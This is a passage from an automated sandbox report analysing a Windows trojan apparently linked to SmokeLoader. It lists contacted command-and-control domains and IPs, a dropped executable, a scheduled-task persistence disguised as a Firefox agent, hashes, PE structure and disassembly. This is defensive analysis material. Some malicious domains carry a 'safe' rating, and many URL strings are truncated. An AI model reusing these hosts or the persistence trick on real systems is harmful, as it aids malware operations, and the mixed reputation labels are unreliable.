                                              http://schemas.microexplorer.exe, 00000003.00000002.2727383323.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2724814325.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2727361366.0000000007AF0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://word.office.com576explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://host-file-host6.com/tingsTU;explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://lrvsgmets.com/ings#Uexplorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-wexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://excel.office.comEexplorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000003.2159452142.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/aexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://powerpoint.office.comcemberZexplorer.exe, 00000003.00000000.1569386783.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159155796.000000000D0B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://lrvsgmets.com/explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ubpctscp.net/explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://api.msn.com/Xexplorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://api.msn.com/$explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://iwtkhvgidl.com/explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://outlook.comNaP0Bexplorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.40.141.211
                                                                                        		host-file-host6.comGermany
                                                                                        		24940HETZNER-ASDEfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1571560
                                                                                        Start date and time:2024-12-09 14:52:11 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 8s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:9
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:e6reA52T4I.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.evad.winEXE@6/2@2/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 50
                                                                                        • Number of non-executed functions: 41
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • VT rate limit hit for: e6reA52T4I.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        08:53:34API Interceptor780x Sleep call for process: explorer.exe modified
                                                                                        14:53:52Task SchedulerRun new task: Firefox Default Browser Agent 09AD43FFE108D801 path: C:\Users\user\AppData\Roaming\hdeufvw

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        188.40.141.211w4DO1Z18yg.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                        • ceoconstractionstore.pl/index.php
                                                                                        UkHkCa3IYV.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                        • ceoconstractionstore.pl/index.php
                                                                                        3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                        • ceoconstractionstore.pl/index.php
                                                                                        RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • ceoconstractionstore.pl/index.php
                                                                                        abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                                                        • gmpeople.com/upload/
                                                                                        vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • selebration17io.io/index.php
                                                                                        Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • selebration17io.io/index.php
                                                                                        br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • selebration17io.io/index.php
                                                                                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                        • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                                                                                        SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • agressivemnaiq.xyz/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        host-file-host6.comaac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                        • 188.40.141.211
                                                                                        461f0f86f52bfa5fbed84023d0a9c8652bcbca34fea76ad0cb5bb8c503b65c9a_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 172.67.172.189
                                                                                        tWuTbYx8n1.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        toolspub2.exeGet hashmaliciousLummaC, Djvu, PureLog Stealer, SmokeLoader, zgRATBrowse
                                                                                        • 172.67.172.189
                                                                                        O2O2kYZgiH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        toolspub1.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        toolspub2(1).exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        OE83kvJ3ZA.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102
                                                                                        kM2Y1cFSAJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.30.102

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        HETZNER-ASDEx.ps1Get hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                        • 178.63.102.185
                                                                                        32%20VPN.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 136.243.179.5
                                                                                        222.exeGet hashmaliciousNjratBrowse
                                                                                        • 136.243.179.5
                                                                                        600%202024.exeGet hashmaliciousPureLog StealerBrowse
                                                                                        • 178.63.102.185
                                                                                        xhost.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 136.243.179.5
                                                                                        800.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 136.243.179.5
                                                                                        jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                        • 94.130.241.86
                                                                                        .main.elfGet hashmaliciousXmrigBrowse
                                                                                        • 5.75.186.53
                                                                                        .report_system.elfGet hashmaliciousXmrigBrowse
                                                                                        • 5.75.186.53
                                                                                        meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 49.13.51.167

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Roaming\hdeufvw

                                                                                        Download File
                                                                                        Process:C:\Windows\explorer.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):212992
                                                                                        Entropy (8bit):6.801627513912703
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:VCx58iqLwhMYM3NTveoygYFQAuOFBiSY6+3:2qUuYMdTeoVxJs1
                                                                                        MD5:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        SHA1:3323FDCD6CE66E3C1B971B098F26A562892B8C30
                                                                                        SHA-256:B05425661616539E0E68493474745880F03300D9B5CCA894AF732DA010869778
                                                                                        SHA-512:BB34F61CC051C37206D53C6CDF8F198497B9B8FB5A78B7C00B21FD4EC077156F99B96C6D236CDA7152376D54D8948316F02D4269A5C00047CC1D9937540916E0
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....wc.....................^9......|............@...........................;.....R...........................................d....`;.hf...........................................................A..@............................................text...(........................... ..`.data...H.8......H..................@....rsrc...hf...`;..h..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\hdeufvw:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Windows\explorer.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.801627513912703
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                        • Clipper DOS Executable (2020/12) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • VXD Driver (31/22) 0.00%
                                                                                        File name:e6reA52T4I.exe
                                                                                        File size:212'992 bytes
                                                                                        MD5:855e7cd7024d340b83123c75d9d4fb1c
                                                                                        SHA1:3323fdcd6ce66e3c1b971b098f26a562892b8c30
                                                                                        SHA256:b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778
                                                                                        SHA512:bb34f61cc051c37206d53c6cdf8f198497b9b8fb5a78b7c00b21fd4ec077156f99b96c6d236cda7152376d54d8948316f02d4269a5c00047cc1d9937540916e0
                                                                                        SSDEEP:3072:VCx58iqLwhMYM3NTveoygYFQAuOFBiSY6+3:2qUuYMdTeoVxJs1
                                                                                        TLSH:2524BE2263E1D072E2274630CE66C1B56B2BB8614FB1A6DB33C45A7F4E315E1C67532E
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....wc...................

                                                                                        File Icon

                                                                                        Icon Hash:4559818250554549

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x407c9a
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6377D1FE [Fri Nov 18 18:42:06 2022 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:1
                                                                                        File Version Major:5
                                                                                        File Version Minor:1
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:1
                                                                                        Import Hash:3cf8645c93eebd6a8066c6479eebf80f

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007FA7A8EF6556h
                                                                                        jmp 00007FA7A8EF1AFEh
                                                                                        push dword ptr [0042F104h]
                                                                                        call dword ptr [00401110h]
                                                                                        test eax, eax
                                                                                        je 00007FA7A8EF1C74h
                                                                                        call eax
                                                                                        push 00000019h
                                                                                        call 00007FA7A8EF54FDh
                                                                                        push 00000001h
                                                                                        push 00000000h
                                                                                        call 00007FA7A8EF3A78h
                                                                                        add esp, 0Ch
                                                                                        jmp 00007FA7A8EF3A3Dh
                                                                                        int3
                                                                                        int3
                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                        test ecx, 00000003h
                                                                                        je 00007FA7A8EF1C96h
                                                                                        mov al, byte ptr [ecx]
                                                                                        add ecx, 01h
                                                                                        test al, al
                                                                                        je 00007FA7A8EF1CC0h
                                                                                        test ecx, 00000003h
                                                                                        jne 00007FA7A8EF1C61h
                                                                                        add eax, 00000000h
                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                        mov eax, dword ptr [ecx]
                                                                                        mov edx, 7EFEFEFFh
                                                                                        add edx, eax
                                                                                        xor eax, FFFFFFFFh
                                                                                        xor eax, edx
                                                                                        add ecx, 04h
                                                                                        test eax, 81010100h
                                                                                        je 00007FA7A8EF1C5Ah
                                                                                        mov eax, dword ptr [ecx-04h]
                                                                                        test al, al
                                                                                        je 00007FA7A8EF1CA4h
                                                                                        test ah, ah
                                                                                        je 00007FA7A8EF1C96h
                                                                                        test eax, 00FF0000h
                                                                                        je 00007FA7A8EF1C85h
                                                                                        test eax, FF000000h
                                                                                        je 00007FA7A8EF1C74h
                                                                                        jmp 00007FA7A8EF1C3Fh
                                                                                        lea eax, dword ptr [ecx-01h]
                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                        sub eax, ecx
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx-02h]
                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                        sub eax, ecx
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx-03h]
                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                        sub eax, ecx
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx-04h]
                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                        sub eax, ecx
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        push ebp

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x28e080x64.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b60000x6668.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x41e00x40.text
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x200.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x28a280x28c00c095df63e7151fea8c2bd339789d7783False0.7269878738496932data7.320070104865159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .data0x2a0000x38b5480x480017c6a1d7e5d47af4f6cfb7d9079160dcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x3b60000x66680x6800e7f422aef4e042a1ea53282032f834bcFalse0.45845853365384615data4.308474363469441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x3b62b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland0.29693140794223827
                                                                                        RT_ICON0x3b62b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway0.29693140794223827
                                                                                        RT_ICON0x3b62b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden 0.29693140794223827
                                                                                        RT_ICON0x3b6b580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.28330206378986866
                                                                                        RT_ICON0x3b6b580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.28330206378986866
                                                                                        RT_ICON0x3b6b580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.28330206378986866
                                                                                        RT_ICON0x3b7c280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland0.6534296028880866
                                                                                        RT_ICON0x3b7c280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway0.6534296028880866
                                                                                        RT_ICON0x3b7c280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden 0.6534296028880866
                                                                                        RT_ICON0x3b84d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland0.4794605809128631
                                                                                        RT_ICON0x3b84d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway0.4794605809128631
                                                                                        RT_ICON0x3b84d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden 0.4794605809128631
                                                                                        RT_ICON0x3baa780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.5077392120075047
                                                                                        RT_ICON0x3baa780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.5077392120075047
                                                                                        RT_ICON0x3baa780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.5077392120075047
                                                                                        RT_STRING0x3bbd600x1e2Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0Sami LappishFinland0.504149377593361
                                                                                        RT_STRING0x3bbd600x1e2Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0Sami LappishNorway0.504149377593361
                                                                                        RT_STRING0x3bbd600x1e2Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0Sami LappishSweden 0.504149377593361
                                                                                        RT_STRING0x3bbf480x18cdataSami LappishFinland0.5151515151515151
                                                                                        RT_STRING0x3bbf480x18cdataSami LappishNorway0.5151515151515151
                                                                                        RT_STRING0x3bbf480x18cdataSami LappishSweden 0.5151515151515151
                                                                                        RT_STRING0x3bc0d80x372dataSami LappishFinland0.47165532879818595
                                                                                        RT_STRING0x3bc0d80x372dataSami LappishNorway0.47165532879818595
                                                                                        RT_STRING0x3bc0d80x372dataSami LappishSweden 0.47165532879818595
                                                                                        RT_STRING0x3bc4500x216dataSami LappishFinland0.5056179775280899
                                                                                        RT_STRING0x3bc4500x216dataSami LappishNorway0.5056179775280899
                                                                                        RT_STRING0x3bc4500x216dataSami LappishSweden 0.5056179775280899
                                                                                        RT_GROUP_ICON0x3bbb200x30dataSami LappishFinland0.9375
                                                                                        RT_GROUP_ICON0x3bbb200x30dataSami LappishNorway0.9375
                                                                                        RT_GROUP_ICON0x3bbb200x30dataSami LappishSweden 0.9375
                                                                                        RT_GROUP_ICON0x3b7c000x22dataSami LappishFinland0.9705882352941176
                                                                                        RT_GROUP_ICON0x3b7c000x22dataSami LappishNorway0.9705882352941176
                                                                                        RT_GROUP_ICON0x3b7c000x22dataSami LappishSweden 0.9705882352941176
                                                                                        RT_VERSION0x3bbb500x20cdata0.5477099236641222

                                                                                        Imports

                                                                                        DLLImport
